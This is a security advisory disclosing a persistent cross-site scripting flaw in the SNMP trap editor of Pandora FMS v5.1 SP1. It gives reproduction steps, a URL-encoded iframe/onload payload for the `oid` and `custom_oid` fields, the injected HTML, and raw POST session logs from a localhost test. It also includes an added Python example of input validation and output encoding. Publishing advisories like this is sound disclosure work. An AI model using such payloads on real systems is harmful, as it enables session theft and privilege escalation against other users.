
Pandora FMS v5.1 SP1 - Persistent SNMP Editor Vulnerability



Document Title:
===============
Pandora FMS v5.1 SP1 - Persistent SNMP Editor Vulnerability


References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1356


Release Date:
=============
2015-01-14


Vulnerability Laboratory ID (VL-ID):
====================================
1356


Common Vulnerability Scoring System:
====================================
3.4


Product & Service Introduction:
===============================
Pandora FMS is a monitoring Open Source software. It watches your systems and
applications, and allows you to know the status of any element of those systems.
Pandora FMS could detect a network interface down, a defacement in your website,
a memory leak in one of your server applications, or the movement of any value
of the NASDAQ new technology market.

    * Detect new systems in network.
    * Checks for availability or performance.
    * Raise alerts when something goes wrong.
    * Allow to get data inside systems with its own lite agents (for almost every Operating System).
    * Allow to get data from outside, using only network probes. Including SNMP.
    * Get SNMP Traps from generic network devices.
    * Generate real time reports and graphics.
    * SLA reporting.
    * User defined graphical views.
    * Store data for months, ready to be used on reporting.
    * Real time graphs for every module.
    * High availability for each component.
    * Scalable and modular architecture.
    * Supports up to 2500 modules per server.
    * User defined alerts. Also could be used to react on incidents.
    * Integrated incident manager.
    * Integrated DB management: purge and DB compaction.
    * Multiuser, multi profile, multi group.
    * Event system with user validation for operation in teams.
    * Granularity of accesses and user profiles for each group and each user.
    * Profiles could be personalized using up to eight security attributes without limitation on groups or profiles.

Pandora FMS runs on any operating system, with specific agents for each
platform, gathering data and sending it to a server. It has specific agents for
GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, and Windows 2000, XP and 2003.

(Copy of the Vendor Homepage: http://pandorafms.org/index.php?sec=project&sec2=home&lang=en)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent web 
vulnerability in the official Pandora FMS v5.1 SP1 monitoring web-application.


Vulnerability Disclosure Timeline:
==================================
2015-01-14:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Artica Soluciones Tecnologicas
Product: Pandora FMS - Monitoring Web Application 5.1 SP1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in
the official Pandora FMS v5.1 SP1 monitoring web-application. The vulnerability
allows an attacker to inject own script code as payload into the
application-side of the vulnerable service function or module.

The vulnerability is located in the `oid` and `custom_oid` values of the `snmp
trap editor` module. Remote attackers with low privileged user accounts are
able to manipulate the create POST method request of the `snmp trap editor`
module to compromise user session information. The attack vector is persistent
on the application-side and the request method to inject is POST. The issue
allows an attacker to stream persistent malicious script code to the front site
of the `snmp trap editor` module, where the `item context` becomes visible as a
list. Local low privileged application user accounts with access to the snmp
editor can inject their own malicious script code to steal session information
of a higher privileged monitoring application user account.

The security risk of the application-side web vulnerability is estimated as
medium with a CVSS (Common Vulnerability Scoring System) score of 3.4.
Exploitation of the application-side web vulnerability requires a low
privileged web-application user account and low or medium user interaction.
Successful exploitation of the vulnerability results in persistent phishing
mails, session hijacking, persistent external redirects to malicious sources
and application-side manipulation of affected or connected module context.

Request Method(s):
                                        [+] POST

Vulnerable Module(s):
                                        [+] SNMP > SNMP Trap Editor 

Vulnerable Parameter(s):
                                        [+] oid
                                        [+] custom_oid

Affected Module(s):
                                        [+] SNMP Trap Editor - Index


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote
attackers with low privileged application user accounts and low user
interaction. For security demonstration or to reproduce the vulnerability,
follow the provided information and steps below.

Manual steps to reproduce the vulnerability ...
1. Open the Pandora FMS web-application and login with a low privileged user
account that is allowed to access the monitoring SNMP editor module
2. Surf to SNMP > SNMP trap editor
3. Create a new entry and inject own payloads with script code into the OID &
Custom OID input fields
4. Save the input
Note: The monitoring service refreshes the list after the POST method request
to add and displays the stored items of the snmp trap editor
5. The injected script code executes on the application-side of the service in
the item output listing of the snmp_trap_editor
6. Successful reproduce of the security vulnerability!


Payload: (SNMP trap editor - Create)
oid=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C
&custom_oid=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C">"
><iframe src="a" onload="alert("VL")" <="" "=""><iframe src=a 
>onload=alert("VL") <


PoC: Exploit (SNMP trap editor - After the Create)
<table style="width:98%;" class="databox" id="table3" border="0" 
cellpadding="4" cellspacing="4"><thead><tr><th class="header c0" 
scope="col">OID</th><th class="header c1" scope="col">Custom OID</th><th 
class="header c2" scope="col">Severity</th><th class="header c3" 
scope="col">Text</th><th class="header c4" scope="col">Description</th><th 
class="header c5" scope="col">Actions</th></tr></thead>
<tbody>
<tr id="table3-0" style="" class="datos2">
<td id="table3-0-0" style="" class="datos2 "><a 
href="index.php?sec=estado&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor_form&
oid=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C&
custom_oid=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C">"
><iframe src="a" onload="alert("VL")" <="" "=""><iframe src=a 
>onload=alert("VL") <</a></td>
<td id="table3-0-1" style=""   class="datos2 ">


--- PoC Session Logs [POST] ---
Status: 200[OK]
 POST 
http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor_form
 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[fms.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 
Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      
Referer[http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor&delete_trap=1&id=-1%27]
      Cookie[PHPSESSID=21dq3ua37bcjcibptdn8uonk76]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   POST-Daten:
      add_trap[1]
      crt[Create]
   Response Header:
      Date[Mon, 17 Nov 2014 00:38:29 GMT]
      Server[Apache/2.2.15 (CentOS)]
      X-Powered-By[PHP/5.3.3]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0]
      Pragma[no-cache]
      Set-Cookie[=deleted; expires=Sun, 17-Nov-2013 00:38:29 GMT; path=/
clippy=deleted; expires=Sun, 17-Nov-2013 00:38:29 GMT
=deleted; expires=Sun, 17-Nov-2013 00:38:29 GMT; path=/
clippy=deleted; expires=Sun, 17-Nov-2013 00:38:29 GMT]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
 POST 
http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor
 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des 
Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[fms.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 
Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      
Referer[http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor_form]
      Cookie[PHPSESSID=21dq3ua37bcjcibptdn8uonk76]
      Connection[keep-alive]
   POST-Daten:
      
oid[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C+%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      
custom_oid[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      severity[2]
      
text[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C+++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      
description[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      add_trap[1]
      submit[Create]
   Response Header:
      Date[Mon, 17 Nov 2014 00:40:05 GMT]
      Server[Apache/2.2.15 (CentOS)]
      X-Powered-By[PHP/5.3.3]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0]
      Pragma[no-cache]
      Set-Cookie[=deleted; expires=Sun, 17-Nov-2013 00:40:05 GMT; path=/
clippy=deleted; expires=Sun, 17-Nov-2013 00:40:05 GMT
=deleted; expires=Sun, 17-Nov-2013 00:40:05 GMT; path=/
clippy=deleted; expires=Sun, 17-Nov-2013 00:40:05 GMT]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET http://fms.localhost:8080/pandora/%22%3E%3C[PERSISTENT INJECTED SCRIPT 
CODE!] 
Load Flags[LOAD_DOCUMENT_URI  ] Größe des Inhalts[295] Mime Type[text/html]
   Request Header:
      Host[fms.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 
Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      
Referer[http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor]
      Cookie[PHPSESSID=21dq3ua37bcjcibptdn8uonk76]
      Connection[keep-alive]
   Response Header:
      Date[Mon, 17 Nov 2014 00:40:07 GMT]
      Server[Apache/2.2.15 (CentOS)]
      Content-Length[295]
      Connection[close]
      Content-Type[text/html; charset=iso-8859-1]


Reference(s):
http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor_form
http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor
http://fms.localhost:8080/pandora/



Solution - Fix & Patch:
=======================
The security vulnerability can be patched by a secure restriction or filtering
of the OID and Custom OID input fields. Encode and parse the input field
context to prevent persistent execution of script code through the vulnerable
snmp editor module.
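The following is an added example, not code from the advisory or from the
Pandora FMS project, illustrating the two controls named in the Technical
Details and Solution sections above: a strict allow-list check on the `oid` and
`custom_oid` values at create time, and HTML output encoding when stored items
are rendered in the trap editor listing. Pandora FMS itself is PHP; the example
is written in Python so it runs stand-alone. The sample request body is
constructed from the URL-encoded payload shown in the PoC session log, and the
function and constant names (`is_valid_oid`, `process_trap_create`,
`render_listing_cell`) are hypothetical.

```python
import html
import re
from urllib.parse import parse_qs

# Allow-list: an SNMP OID is dotted decimal, first arc 0..2, at least two arcs.
# Anything else (quotes, angle brackets, letters) is rejected before storage.
OID_RE = re.compile(r"[0-2](\.\d+)+")

# Constructed sample bodies. The first reuses the URL-encoded payload from the
# advisory's PoC session log; the second is a benign net-snmp trap OID.
SAMPLE_ATTACK_BODY = (
    "oid=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C"
    "&custom_oid=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C"
    "&severity=2&add_trap=1&submit=Create"
)
SAMPLE_GOOD_BODY = (
    "oid=1.3.6.1.4.1.8072.2.3.0.1&custom_oid=1.3.6.1.4.1.8072.2.3.2.1"
    "&severity=2&add_trap=1&submit=Create"
)


def is_valid_oid(value: str) -> bool:
    """Input validation (hypothetical helper): only numeric dotted OIDs pass."""
    return OID_RE.fullmatch(value) is not None


def encode_for_html(value: str) -> str:
    """Output encoding for an HTML text or double-quoted attribute context."""
    return html.escape(value, quote=True)


def process_trap_create(body: str) -> dict:
    """Parse a form-encoded create request like the advisory's POST and decide,
    per OID field, whether the value may be stored.

    Returns {field: ("accepted", value) | ("rejected", reason)}.
    """
    params = parse_qs(body, keep_blank_values=True)
    decision = {}
    for field in ("oid", "custom_oid"):
        raw = params.get(field, [""])[0]
        if is_valid_oid(raw):
            decision[field] = ("accepted", raw)
        else:
            decision[field] = ("rejected", "not a dotted-decimal OID")
    return decision


def render_listing_cell(stored_value: str) -> str:
    """Render one <td> of the trap editor listing. Encoding on output means a
    value stored before the input check existed is still neutralised."""
    return '<td class="datos2">' + encode_for_html(stored_value) + "</td>"


if __name__ == "__main__":
    for name, body in (("attack", SAMPLE_ATTACK_BODY), ("benign", SAMPLE_GOOD_BODY)):
        print(name, process_trap_create(body))
    # Decoded form of the PoC payload, rendered safely:
    print(render_listing_cell('"><iframe src=a onload=alert("VL") <'))
```

The order matters: the allow-list check stops new malicious entries at the
create request, while encoding at render time covers rows that were stored
before the fix, which is why both are applied rather than either alone.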


Security Risk:
==============
The security risk of the application-side input validation web vulnerability in
the Pandora interface is estimated as medium. Lower privileged application user
accounts are able to inject the code to steal session information and gain
higher application access privileges.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(bkm@xxxxxxxxxxxxxxxxx) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen 
material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@xxxxxxxxxxxxxxxxxxxxx - research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All 
other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To 
record, list (feed), modify, use or edit our material contact 
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a 
permission.

                                Copyright © 2015 | Vulnerability Laboratory - Evolution Security GmbH ™

-- 
COMPANY: Evolution Security GmbH - ADMINISTRATION
REPRESENTATIVES: Benjamin Kunz Mejri (DE)
LOCATION: HansRömhild Straße 14 @ 34128 Kassel (Hessen) in Germany
DOMAIN: www.evolution-sec.com
CONTACT: admin@xxxxxxxxxxxxxxxxx
PGP KEY: http://evolution-sec.com/admin@xxxxxxxxxxxxxxxxx%280x921A7E4C%29.asc

Phone: +49561-40064622 or 0561-40064622
Fax:  +49561-40066220 or 0561-40066220
Mobile:  +4915750765406 or 015750765406